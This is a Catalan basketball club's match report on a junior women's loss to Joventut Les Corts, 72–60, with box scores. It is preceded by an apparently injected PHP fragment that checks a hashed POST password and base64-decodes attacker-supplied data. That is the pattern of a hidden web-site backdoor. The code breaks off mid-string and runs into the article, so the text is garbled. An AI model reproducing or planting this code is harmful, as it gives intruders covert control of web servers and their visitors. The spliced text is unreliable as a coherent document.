function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Derrota a domicili contra un bon rival -

Derrota a domicili contra un bon rival

Updated: novembre 2, 2022

Derrota del Júnior femení de 1r any a la visita a un dels equips de la part alta de la competició, el Joventut Les Corts. El partit va començar amb un gran encert per part de les noies del TGN des del triple, tres en tres minuts, i amb un bon ritme ofensiu, 26 punts al primer període. Les locals van anar reduint l’avantatge al marcador des de la línia de personal amb un gran percentatge.

Al segon període va ser decisiu per la remuntada de les locals que van superar la defensa de les liles amb penetracions i contraatacs per fer moltes cistelles fàcils i posar el marcador al descans 15 punts a baix per les liles, 49 a 34. Al tercer quart es va remuntar el marcador amb una gran defensa i intensitat per ficar el marcador 53 a 47 al minut 28. A partir d’aquí es va intentar, però sense èxit, les locals van administrar bé la diferencia i les noies del TGN ho van intentar fins als darrers minuts, marcador final 72 a 60.

JOVENTUT LES CORTS 72 – TGN BÀSQUET 06A 60

PARCIALS: 22-26, 27-8, 10-14, 13-12

JOVENTUT LES CORTS: Cabrera (4), Sicart (9), Lozano (12), Becerra (8), Clemente -cinc inicial- Terradellas (4), Sorigué (5), Martí (8), Garcia, Llopart (13), De Moya (3) i Latorre (6). 2 Triples: Becerra i De Moya
LES XIFRES DEL PARTIT: Tirs lliures: 16/23. Faltes: 22. Eliminats: Cap.

TGN BÀSQUET 06A: Muiño (8), Lapuente (6), Picó (11), Díez (10), Sanromà (2) -cinc inicial- González (6), Forés (7), Villena (4), Canals, Boix (2) i Ral (4). 6 triples: 2 Muiño, Forés, Díez, Lapuente i Ral.
LES XIFRES DEL PARTIT: Tirs lliures: 10/22. Faltes: 19. Eliminats: Cap